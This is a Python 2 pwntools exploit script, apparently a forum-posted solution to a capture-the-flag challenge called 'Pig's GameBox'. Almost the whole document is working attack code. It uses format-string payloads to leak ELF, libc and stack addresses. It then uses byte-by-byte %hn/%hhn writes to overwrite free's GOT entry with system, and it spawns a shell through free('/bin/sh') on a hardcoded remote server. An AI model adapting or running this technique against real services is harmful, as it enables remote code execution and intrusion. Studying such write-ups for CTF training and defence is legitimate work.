#!/usr/bin/env python2
# -*- coding:utf8 -*-
# execve generated by ROPgadget
import struct
from pwn import *
from pwnlib.util.proc import wait_for_debugger
#context(os='linux', arch='i386', log_level='debug') #i386 or amd64
#用python xxx.py elf 1调用远程
local = len(sys.argv) == 2
elf = ELF(sys.argv[1])
if local:
io = process(sys.argv[1])
#libc = ELF("/lib/i386-linux-gnu/libc.so.6") #32bit
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #64bit
#raw_input("wait for debugger:")
#io = remote("localhost", 10001)
else:
io = remote("106.2.25.7", 8001)
libc = ELF("libc-2.23.so")
"""
puts("Welcome to Pig's GameBox!");
puts("(P)lay GUESS WORDS");
puts("(S)how RANK");
puts("(D)elete RANK");
puts("(C)hange RANK");
puts("(E)xit");
"""
def fuzz_guess_words(code,name_len,name):
io.sendlineafter("(E)xit","P")
io.sendlineafter("what I write:",code)
pass
def play_guess_words(code,name_len,name):
io.sendlineafter("(E)xit","P")
io.sendlineafter("what I write:",code)
io.sendlineafter(" name length:",str(name_len))
io.sendlineafter("your name:",name)
def show_rank():
io.sendlineafter("(E)xit","S")
def delete_rank(idx,code):
io.sendlineafter("(E)xit","D")
io.sendlineafter("Input index:",str(idx))
io.sendlineafter("Input Cookie:",code)
s = """
NWLRBBMQBHCDARZOWKKYHIDD
QSCDXRJMOWFRXSJYBLDBEFSA
RCBYNECDYGGXXPKLORELLNMP
APQFWKHOPKMCOQHNWNKUEWHS
QMGBBUQCLJJIVSWMDKQTBXIX
MVTRRBLJPTNSNFWZQFJMAFAD
RRWSOFSBCNUVQHFFBSAQXWPQ
CACEHCHZVFRKMLNOZJKPQPXR
JXKITZYXACBHHKICQCOENDTO
MFGDWDWFCGPXIQVKUYTDLCGD
EWHTACIOHORDTQKVWCSGSPQO
QMSBOAGUWNNYQXNZLGDGWPBT
RWBLNSADEUGUUMOQCDRUBETO
KYXHOACHWDVMXXRDRYXLMNDQ
TUKWAGMLEJUUKWCIBXUBUMEN
MEYATDRMYDIAJXLOGHIQFMZH
LVIHJOUVSUYOYPAYULYEIMUO
TEHZRIICFSKPGGKBBIPZZRZU
CXAMLUDFYKGRUOWZGIOOOBPP
LEQLWPHAPJNADQHDCNVWDTXJ
BMYPPPHAUXNSPUSGDHIIXQMB
FJXJCVUDJSUYIBYEBMWSIQYO
YGYXYMZEVYPZVJEGEBEOCFUF
TSXDIXTIGSIEEHKCHZDFLILR
JQFNXZTQRSVBSPKYHSENBPPK
QTPDDBUOTBBQCWIVRFXJUJJD
DNTGEIQVDGAIJVWCYAUBWEWP
JVYGEHLJXEPBPIWUQZDZUBDU
""".replace("\n","").replace(" ","")
codes = [s[i*24:i*24+24] for i in range(len(s)/24)]
# print "codes",len(codes)
#fuzz the code
# wait_for_debugger(io.pid)
# while True:
# fuzz_guess_words('a',20,"aa")
cidx = 0
#leak elf base
play_guess_words(codes[cidx],20,"%9$p..")
cidx +=1
#leak libc base
play_guess_words(codes[cidx],20,"%13$p..")
cidx +=1
#leap rsp
play_guess_words(codes[cidx],20,"%8$p..")
cidx += 1
#leap param 41
play_guess_words(codes[cidx],20,"%41$p..") #打印%41处地址
cidx += 1
#一个show_rank可以一次泄露,也可以多次show_rank
show_rank()
io.recvuntil("0:")
main_addr = int(io.recvuntil("..",drop=True),16) - 0x61
elf_base = main_addr - 6260
success("elf_base: %x"%elf_base)
io.recvuntil("1:")
__libc_start_main_addr = int(io.recvuntil("..",drop=True),16) - 0xf0
libc_base = __libc_start_main_addr - libc.symbols["__libc_start_main"]
success("libc_base: %x"%libc_base)
system_addr = libc_base + libc.symbols["system"]
free_addr = libc_base + libc.symbols["free"]
free_got = elf_base + elf.got["free"]
success("system_addr: %x"%system_addr)
success("free_addr: %x"%free_addr)
success("free_got: %x"%free_got)
io.recvuntil("2:")
rsp_addr = int(io.recvuntil("..",drop=True),16) - 0x30
success("rsp address: %x"%rsp_addr)
#stack: param15 -> param41 -> param X(未对齐)
io.recvuntil("3:")
param_41_addr = int(io.recvuntil("..",drop=True),16)
success("param 41 content: %x"%param_41_addr)
# 清理
delete_rank(0,codes[0])
delete_rank(1,codes[1])
delete_rank(2,codes[2])
delete_rank(3,codes[3])
def hhn_payload(x,pos):
if x == 0:
payload = pos
else:
payload = "%"+str(x)+"c"+ pos
return payload
def hn_payload(x,pos):
if x == 0:
payload = pos
else:
payload = "%"+str(x)+"c"+ pos
return payload
#修正param_41_addr与栈对齐
#stack: param15 -> param41 -> param X(已对齐)
if param_41_addr % 8 != 0:
diff = 8 - param_41_addr %8 #需要进位7fff0ecdd2fd
hn = (param_41_addr + diff) & 0xffff
payload = hn_payload(hn,"%15$hn")
play_guess_words(codes[cidx],20,payload)
show_rank()
delete_rank(0,codes[cidx])
cidx += 1
param_41_addr += diff
success("param 41 content adjust: %x"%param_41_addr)
#将param X内容改为free_got
for i in range(8):
#修改一位param X
hhn = ((free_got >> (8*i) & 0xff))%256
# print 'hhn',i,hhn
payload = hhn_payload(hhn,"%41$hhn")
play_guess_words(codes[cidx],20,payload)
show_rank()
delete_rank(0,codes[cidx])
cidx += 1
if i == 7:
break
#修改一位param 41
hhn = (param_41_addr + i + 1)&0xff
payload = hhn_payload(hhn,"%15$hhn")
play_guess_words(codes[cidx],20,payload) #param41 += 1
show_rank()
delete_rank(0,codes[cidx])
cidx += 1
#修改param41对应的地方,是程序名处,所以ida2pwntools就不能用了:P
#接下来就不能delete了,一般free_addr和system_addr相差3位
#先将param41的内容归位,指向param X(对齐)处。这里有可能进位了,但是概率比较少
hn = (param_41_addr)&0xffff
payload = hn_payload(hn,"%15$hn a")
play_guess_words(codes[cidx],20,payload)
cidx += 1
param_idx = (param_41_addr - rsp_addr)/8 + 6 #8字节对齐,前6位在寄存器中
success("param_idx: %d"%param_idx)
for i in range(3):
#修改free_got低3字节
hhn = ((system_addr >> (8*i) & 0xff))%256
payload = hhn_payload(hhn,"%"+str(param_idx)+"$hhn b"+str(i))
play_guess_words(codes[cidx],20,payload)
cidx += 1
if i == 2:
break
#修改 paramX -> free_got[i+1]
hhn = (free_got + i + 1)&0xff
payload = hhn_payload(hhn,"%41$hhn c"+str(i))
play_guess_words(codes[cidx],20,payload)
cidx += 1
#构造好串:param41的内容归位,修改free_got[0],修改param943+=1,修改free_got[1],修改param943+=1,修改free_got[2]
# wait_for_debugger(io.pid)
show_rank()
# 用free("/bin/sh") 进行 get_shell
play_guess_words(codes[cidx],20,"/bin/sh")
delete_rank(6,codes[cidx])
cidx +=1
io.interactive()
发表于 2020-9-3 22:10:00
|
查看: 4939|
回复: 0
窥视卡
雷达卡
提升卡
置顶卡
关闭卡
开启卡
变色卡
千斤顶
照妖镜